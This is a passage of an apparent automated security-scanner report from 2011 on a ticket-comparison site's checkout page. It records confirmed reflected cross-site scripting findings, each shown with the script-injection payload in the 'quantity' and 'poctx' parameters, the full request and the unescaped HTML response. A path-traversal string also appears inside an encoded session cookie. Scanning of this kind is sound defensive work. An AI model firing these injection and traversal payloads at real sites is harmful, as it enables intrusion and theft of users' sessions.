false, showLocation: true}); }catch(e){ } }); //]]></script><img alt='imgtrkp' height='1' src='/la/pi?m=_uid%3D161141199%3A1342567062754305%3Apgscheckout%7C%252Fcheckout%252Findex%252F418563179%26_ctx%3D%26_ts%3D1311100716%26_st%3D%26_ma%3D13%26_ref%3D' width='1' /></body></html>
- /checkout/index/418563179

/checkout/index/418563179 CONFIRMED

http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D..

Parameters

Parameter Type Value
ctx GET c=tix;mt=int;tsp=0;dt=1;lpos=2
ch GET bing
quantity GET '"--></style></script><script>alert(0x000019)</script>
lp GET true
poctx GET rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;
afm GET 3
uet GET -776896836:7925:pgstickets||bing|mt:int;sz:1254;id:389669
commit GET Change
zipcode GET 3

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000019)%3C/script%3E&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=3&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669&commit=Change&zipcode=3 HTTP/1.1
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: bing.fansnap.com
Cookie: POOLID=B; bg_ver=1; bg_vid=1342567062754305; tvid=1342567045545985; _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlNjNjY2U2NTJiNzhiMmIzMWQ1MWRhNzJiYTI4YzMyYzI6DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2h0dHBkL2xvZ3MvZXJyb3IubG9nJmFmbT0zJnVldD0tNzc2ODk2ODM2JTNBNzkyNSUzQXBnc3RpY2tldHMlN0MlN0NiaW5nJTdDbXQlM0FpbnQlM0JzBjoGRUY6D2JnX3JlZmVyZXIiAi4BaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9cmFuayUzRDM2JTNCY3Jhd2xTY29yZSUzRG51bGwlM0Jwb3AxJTNEMC4wMzc0JTNCcG9wMiUzRDAuMDM3NCUzQnBvcDMlM0QwLjAzNzQlM0ImYWZtPSZ1ZXQ9LTc3Njg5NjgzNiUzQTc5MjUlM0FwZ3N0aWNrZXRzJTdDJTdDYmluZyU3Q210JTNBaW50JTNCc3olM0ExMjU0JTNCaWQlM0EzODk2Njk6EGJnX3Zpc2l0X2lkaQTP0ZoJOhJiZ192aXNpdG9yX2lkSSIVMTM0MjU2NzA2Mjc1NDMwNQY7CEY6EWJnX3N0eWxlX2lkc0kiAAY7CEY6C2JnX2xvY3sKOghsYXRmGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDoIbG5nZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOhBtYXJrZXRfYXJlYWkSOhFkaXNwbGF5X25hbWUiFkRhbGxhcy1Gb3J0IFdvcnRoOhRtYV9kaXNwbGF5X25hbWVADjoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DUSUaaBjoLb2Zmc2V0af6QnQ%3D%3D--ef39b63b84d15e56b0ea68e1065b142be24e695e; bg_lvd=1311100649; ver=1; vid=1342567002106881; lvd=1311100713
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Tue, 19 Jul 2011 18:38:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 26
ETag: "13915e9b14db45b4434bd9e5e444f3f4"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlNjNjY2U2NTJiNzhiMmIzMWQ1MWRhNzJiYTI4YzMyYzI6DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2h0dHBkL2xvZ3MvZXJyb3IubG9nJmFmbT0zJnVldD0tNzc2ODk2ODM2JTNBNzkyNSUzQXBnc3RpY2tldHMlN0MlN0NiaW5nJTdDbXQlM0FpbnQlM0JzBjoGRUY6D2JnX3JlZmVyZXIiAi4BaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9cmFuayUzRDM2JTNCY3Jhd2xTY29yZSUzRG51bGwlM0Jwb3AxJTNEMC4wMzc0JTNCcG9wMiUzRDAuMDM3NCUzQnBvcDMlM0QwLjAzNzQlM0ImYWZtPSZ1ZXQ9LTc3Njg5NjgzNiUzQTc5MjUlM0FwZ3N0aWNrZXRzJTdDJTdDYmluZyU3Q210JTNBaW50JTNCc3olM0ExMjU0JTNCaWQlM0EzODk2Njk6EGJnX3Zpc2l0X2lkaQTP0ZoJOhJiZ192aXNpdG9yX2lkSSIVMTM0MjU2NzA2Mjc1NDMwNQY7CEY6EWJnX3N0eWxlX2lkc0kiAAY7CEY6C2JnX2xvY3sKOghsYXRmGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDoIbG5nZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOhBtYXJrZXRfYXJlYWkSOhFkaXNwbGF5X25hbWUiFkRhbGxhcy1Gb3J0IFdvcnRoOhRtYV9kaXNwbGF5X25hbWVADjoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4A7XVKaBjoLb2Zmc2V0af6QnQ%3D%3D--670eea04950e7813ac9969f144b7519703d023b4; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3798
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns:og='http://opengraphprotocol.org/schema/' xmlns:v='urn:schemas-microsoft-com:vml' xmlns='http://www.w3.org/1999/xhtml'><head><meta content='text/html;charset=UTF-8' http-equiv='content-type' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' name='description' /><meta content='sports tickets, concert tickets, theatre tickets, cheap tickets, NFL tickets, NBA tickets, NCAA tickets, MLB tickets, NHL tickets' name='keywords' /><meta content='55311985224' property='fb:page_id' /><meta content='Taking you to provider site | Bing - Ticket Search' property='og:title' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' property='og:description' /><meta content='http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/fansnap-logo-sm.png?REL-fansnap-1.20.2-r31787' property='og:image' /><title>Taking you to provider site | Bing - Ticket Search</title><link href="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><!--[if lte IE 6]><link href="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-ie6gz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><![endif]--><script type='text/javascript'> //<![CDATA[ function resizeInclusion(id){ var height; if (id && document.getElementById(id)){ if (typeof(document.getElementById(id).contentWindow) == 'undefined') height = document.getElementById(id).document.body.scrollHeight; else height = document.getElementById(id).contentWindow.document.body.scrollHeight; document.getElementById(id).style.height = height + "px"; } }; //]]></script></head><body class='checkoutcontroller index '><div id='doc4'><div id='hd'></div><div id='bd'><div class='interstitial leaving'><div class='interstitial-top'></div><div class='interstitial-btm'></div><div id='checkout_desired_quantity' style='display:none'><div class='leftside'><h2>Please select the number of tickets</h2><p>Once you select a quantity, we'll take you to StubHub.</p><p><select class="quantity desired_quantity" name="desired_quantity"><option value="2">2 tickets</option></select></p><div class='continue'><input onclick='CheckoutInterstitialController.setQuantity()' style='cursor: pointer' type='button' value='Go' /><a href="#" onclick="window.close()">Return</a></div></div></div><div id='checkout_leaving' style=''><div id='interstitial_display'><div class='leftside'><div class='notice'>You are leaving Bing events, powered by FanSnap</div><div class='broker-info'><div class='broker-logo'><div class='broker-spinner'>now taking you to:</div></div><div class='broker-img'><img alt="Provider-large-511" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787" /></div><div class='clear'></div></div><div class='broker-msg'><b>Member:</b> BBB</div><div class='broker-instructions'><p><strong>StubHub</strong>can answer any questions regarding your purchase.</p></div></div><div class='clear'></div></div></div><div id='checkout_sold_out' style='display:none'><div class='leftside'><h2>Sorry! Another fan just bought those.</h2><p>You'll be returned to Bing in 5 seconds. Click below to return immediately.</p><div class='continue'><a href="#" onclick="window.close()">Return</a></div></div><div class='clear'></div></div><div id='checkout_price_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price has changed</h2><p><span class="price_str"></span>.</p><div class='continue'><input name="id" type="hidden" value="418563179" /><input name="quantity" type="hidden" value="'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000019)&lt;/script&gt;" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><input name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_quantity_changed' style='display:none'><div class='leftside'><h2>The quantity has changed</h2><p>Sorry! Another fan has bought some of these tickets.</p><form action='/checkout/clickout' class='confirmForm' method='get'><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><select class="quantity quantity_only" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></form></div></div><div id='checkout_price_and_quantity_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price and quantity has changed</h2><p><span class="price_str"></span>. Also, another fan just bought some of these tickets.</p><p>Please choose another quanity:</p><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><select class="quantity quantity_and_price" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_price_and_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_error' style='display:none'><div class='leftside'><h2>An error has occurred</h2><p>Sorry, we cannot take you to the provider site to purchase these tickets at this time. We have been notified of this problem. You'll be returned Bing in 5 seconds. Click below to return immediately.</p><p class='continue'><a href="#" onclick="window.close()">Return</a></p></div></div><img alt="" height="1" id="affiliatePixel" src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png?REL-fansnap-1.20.2-r31787" style="position: absolute; z-index: 9999;" width="1" /></div></div><div class='clear'></div><div id='ft'><div id='footer'>&copy; 2008-2011 FanSnap, Inc.&nbsp;-&nbsp;<a href="/about">About FanSnap</a>&nbsp;-&nbsp;<a href="/blog">Blog</a>&nbsp;-&nbsp;<a href="/providers">Partners</a>&nbsp;-&nbsp;<a href="/developers">Developers</a>&nbsp;-&nbsp;<a href="/developers/affiliates">Affiliates</a>&nbsp;-&nbsp;<a href="/contact">Contact</a>&nbsp;-&nbsp;<a href="/privacy">Privacy</a>&nbsp;-&nbsp;<a href="/sitemap">Site Map</a>&nbsp;-&nbsp;<a href="/venues">Event Venues</a>&nbsp;-&nbsp;<a href="/metro-areas">Metro Areas</a></div></div></div><div id='locationModal'><form action='#' id='changeLocationForm'><label>Zip Code:</label><input id="zipcode" name="zipcode" type="text" /><input id="saveLocation" name="commit" type="submit" value="Change" /><div id='cancelLocation'></div></form></div><div class='sp1'></div><div class='clear'></div><script type="text/javascript">//<![CDATA[var fsi__ = { ch: 'bing', srv: 'ip-10-250-26-209', bld: 'REL-fansnap-1.20.2-r31787', vstId: 161141199, usr: {id: null, e: null}, st: ''};//]]></script><script src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type='text/javascript'> //<![CDATA[ fsTop.assetHost = 'http://cdn-%d.f6img.com/REL-fansnap-1.20.2-r31787'; fsTop.assetVersion = 'REL-fansnap-1.20.2-r31787'; //]]></script><script type="text/javascript">//<![CDATA[fsTop.channel = new Channel({"code":"bg","id":7,"name":"bing"}, true, "fansnap.com");//]]></script><script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type="text/javascript">//<![CDATA[LoggerUtil.initialize(true)//]]></script><script type="text/javascript">//<![CDATA[PageUet.initialize('seats-uet', '-776896836:7925:pgscheckout','','bing',{tag:'mt:int;sz:1254;id:389669'})//]]></script><script type="text/javascript">//<![CDATA[CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 418563179, quantity: '"--></style></script><script>netsparker(0x000019)</script>, ctx: escape('c=tix;mt=int;tsp=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '3' });//]]></script><div class='fansnaptron' id='fbAuthModal'><iframe allowtransparency='true' frameborder='0' id='fbAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fbAuthModalClose'><a class='fbAuthClose'>Close</a></div></div><div class='survey-confirm' id='fsAuthModal'><iframe allowtransparency='true' frameborder='0' id='fsAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fsAuthModalClose'><a class='fsAuthClose'><img alt="Cancel" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" /></a></div></div><div id='fb-root'></div><script type='text/javascript'> //<![CDATA[ var locationChangePosition; $('#locationModal').jqm({overlay:0, trigger: false, onShow: function(h){ h.w.css({top: locationChangePosition.pageY, left: locationChangePosition.pageX}).show(); } }); function changeLocationHandler(e){ locationChangePosition = {pageX: e.clientX, pageY: e.clientY}; $('#locationModal').jqmShow(); return false; } $('#cancelLocation').click(function(){ $('#locationModal').jqmHide(); return false; }); $('#changeLocationForm').submit(function(){ $.cookie('zipcode', $('input#zipcode').val(), { path: '/'}); $('#locationModal').jqmHide(); window.location.href = window.location.href; return false; }); //]]></script><script type='text/javascript'> //<![CDATA[ window.fbAsyncInit = function() { FB.init({appId: '105579996199059', status: true, cookie: true, xfbml: true}); }; (function() { var e = document.createElement('script'); e.async = true; e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js'; document.getElementById('fb-root').appendChild(e); }()); //]]></script><script type='text/javascript'> //<![CDATA[ $(function(){ try{ FSAuthentication.init({myBindHost: 'www.fansnap.com', parentHost: 'bing.fansnap.com', parentProtocol: 'http://', isLoggedIn: false, showLocation: true}); }catch(e){ } }); //]]></script><img alt='imgtrkp' height='1' src='/la/pi?m=_uid%3D161141199%3A1342567062754305%3Apgscheckout%7C%252Fcheckout%252Findex%252F418563179%26_ctx%3D%26_ts%3D1311100717%26_st%3D%26_ma%3D13%26_ref%3Dhttp%253A%252F%252Fbing.fansnap.com%252Fcheckout%252Findex%252F418563179%253Fctx%253Dc%25253Dtix%25253Bmt%25253Dint%25253Btsp%25253D0%25253Bdt%25253D1%25253Blpos%25253D2%2526ch%253Dbing%2526quantity%253D2%2526lp%253Dtrue%2526poctx%253Drank%25253D36%25253BcrawlScore%25253Dnull%25253Bpop1%25253D0.0374%25253Bpop2%25253D0.0374%25253Bpop3%25253D0.0374%25253B%2526afm%253D%2526uet%253D-776896836%25253A7925%25253Apgstickets%25257C%25257Cbing%25257Cmt%25253Aint%25253Bsz%25253A1254%25253Bid%25253A389669' width='1' /></body></html>
- /checkout/index/418563179

/checkout/index/418563179 CONFIRMED

http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D..

Parameters

Parameter Type Value
ctx GET c=tix;mt=int;tsp=0;dt=1;lpos=2
ch GET bing
quantity GET 2
lp GET true
poctx GET '"--></style></script><script>alert(0x00002C)</script>
afm GET 3
uet GET -776896836:7925:pgstickets||bing|mt:int;sz:1254;id:389669

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00002C)%3C/script%3E&afm=3&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: bing.fansnap.com
Cookie: POOLID=B; bg_ver=1; bg_vid=1342567062754305; tvid=1342567045545985; _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlNjNjY2U2NTJiNzhiMmIzMWQ1MWRhNzJiYTI4YzMyYzI6DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2h0dHBkL2xvZ3MvZXJyb3IubG9nJmFmbT0zJnVldD0tNzc2ODk2ODM2JTNBNzkyNSUzQXBnc3RpY2tldHMlN0MlN0NiaW5nJTdDbXQlM0FpbnQlM0JzBjoGRUY6D2JnX3JlZmVyZXIiAi4BaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9cmFuayUzRDM2JTNCY3Jhd2xTY29yZSUzRG51bGwlM0Jwb3AxJTNEMC4wMzc0JTNCcG9wMiUzRDAuMDM3NCUzQnBvcDMlM0QwLjAzNzQlM0ImYWZtPSZ1ZXQ9LTc3Njg5NjgzNiUzQTc5MjUlM0FwZ3N0aWNrZXRzJTdDJTdDYmluZyU3Q210JTNBaW50JTNCc3olM0ExMjU0JTNCaWQlM0EzODk2Njk6EGJnX3Zpc2l0X2lkaQTP0ZoJOhJiZ192aXNpdG9yX2lkSSIVMTM0MjU2NzA2Mjc1NDMwNQY7CEY6EWJnX3N0eWxlX2lkc0kiAAY7CEY6C2JnX2xvY3sKOghsYXRmGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDoIbG5nZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOhBtYXJrZXRfYXJlYWkSOhFkaXNwbGF5X25hbWUiFkRhbGxhcy1Gb3J0IFdvcnRoOhRtYV9kaXNwbGF5X25hbWVADjoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4B3ZISaBjoLb2Zmc2V0af6QnQ%3D%3D--40e0115f18df8baf5a641a2e8b34d067e3f906ef; bg_lvd=1311100649; ver=1; vid=1342567002106881; lvd=1311100713
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Tue, 19 Jul 2011 18:38:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 25
ETag: "0c70229ba9fbdeee259b6db1684861b4"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlNjNjY2U2NTJiNzhiMmIzMWQ1MWRhNzJiYTI4YzMyYzI6DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2h0dHBkL2xvZ3MvZXJyb3IubG9nJmFmbT0zJnVldD0tNzc2ODk2ODM2JTNBNzkyNSUzQXBnc3RpY2tldHMlN0MlN0NiaW5nJTdDbXQlM0FpbnQlM0JzBjoGRUY6D2JnX3JlZmVyZXIiAi4BaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9cmFuayUzRDM2JTNCY3Jhd2xTY29yZSUzRG51bGwlM0Jwb3AxJTNEMC4wMzc0JTNCcG9wMiUzRDAuMDM3NCUzQnBvcDMlM0QwLjAzNzQlM0ImYWZtPSZ1ZXQ9LTc3Njg5NjgzNiUzQTc5MjUlM0FwZ3N0aWNrZXRzJTdDJTdDYmluZyU3Q210JTNBaW50JTNCc3olM0ExMjU0JTNCaWQlM0EzODk2Njk6EGJnX3Zpc2l0X2lkaQTP0ZoJOhJiZ192aXNpdG9yX2lkSSIVMTM0MjU2NzA2Mjc1NDMwNQY7CEY6EWJnX3N0eWxlX2lkc0kiAAY7CEY6C2JnX2xvY3sKOghsYXRmGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDoIbG5nZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOhBtYXJrZXRfYXJlYWkSOhFkaXNwbGF5X25hbWUiFkRhbGxhcy1Gb3J0IFdvcnRoOhRtYV9kaXNwbGF5X25hbWVADjoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4COBpCaBjoLb2Zmc2V0af6QnQ%3D%3D--51e8e6d6d911ed64b9a6eb4126500f328d0e1c86; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3576
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns:og='http://opengraphprotocol.org/schema/' xmlns:v='urn:schemas-microsoft-com:vml' xmlns='http://www.w3.org/1999/xhtml'><head><meta content='text/html;charset=UTF-8' http-equiv='content-type' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' name='description' /><meta content='sports tickets, concert tickets, theatre tickets, cheap tickets, NFL tickets, NBA tickets, NCAA tickets, MLB tickets, NHL tickets' name='keywords' /><meta content='55311985224' property='fb:page_id' /><meta content='Taking you to provider site | Bing - Ticket Search' property='og:title' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' property='og:description' /><meta content='http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/fansnap-logo-sm.png?REL-fansnap-1.20.2-r31787' property='og:image' /><title>Taking you to provider site | Bing - Ticket Search</title><link href="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><!--[if lte IE 6]><link href="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-ie6gz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><![endif]--><script type='text/javascript'> //<![CDATA[ function resizeInclusion(id){ var height; if (id && document.getElementById(id)){ if (typeof(document.getElementById(id).contentWindow) == 'undefined') height = document.getElementById(id).document.body.scrollHeight; else height = document.getElementById(id).contentWindow.document.body.scrollHeight; document.getElementById(id).style.height = height + "px"; } }; //]]></script></head><body class='checkoutcontroller index '><div id='doc4'><div id='hd'></div><div id='bd'><div class='interstitial leaving'><div class='interstitial-top'></div><div class='interstitial-btm'></div><div id='checkout_desired_quantity' style='display:none'><div class='leftside'><h2>Please select the number of tickets</h2><p>Once you select a quantity, we'll take you to StubHub.</p><p><select class="quantity desired_quantity" name="desired_quantity"><option value="2">2 tickets</option></select></p><div class='continue'><input onclick='CheckoutInterstitialController.setQuantity()' style='cursor: pointer' type='button' value='Go' /><a href="#" onclick="window.close()">Return</a></div></div></div><div id='checkout_leaving' style=''><div id='interstitial_display'><div class='leftside'><div class='notice'>You are leaving Bing events, powered by FanSnap</div><div class='broker-info'><div class='broker-logo'><div class='broker-spinner'>now taking you to:</div></div><div class='broker-img'><img alt="Provider-large-511" src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787" /></div><div class='clear'></div></div><div class='broker-msg'><b>Member:</b> BBB</div><div class='broker-instructions'><p><strong>StubHub</strong>can answer any questions regarding your purchase.</p></div></div><div class='clear'></div></div></div><div id='checkout_sold_out' style='display:none'><div class='leftside'><h2>Sorry! Another fan just bought those.</h2><p>You'll be returned to Bing in 5 seconds. Click below to return immediately.</p><div class='continue'><a href="#" onclick="window.close()">Return</a></div></div><div class='clear'></div></div><div id='checkout_price_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price has changed</h2><p><span class="price_str"></span>.</p><div class='continue'><input name="id" type="hidden" value="418563179" /><input name="quantity" type="hidden" value="2" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><input name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_quantity_changed' style='display:none'><div class='leftside'><h2>The quantity has changed</h2><p>Sorry! Another fan has bought some of these tickets.</p><form action='/checkout/clickout' class='confirmForm' method='get'><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><select class="quantity quantity_only" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></form></div></div><div id='checkout_price_and_quantity_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price and quantity has changed</h2><p><span class="price_str"></span>. Also, another fan just bought some of these tickets.</p><p>Please choose another quanity:</p><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" 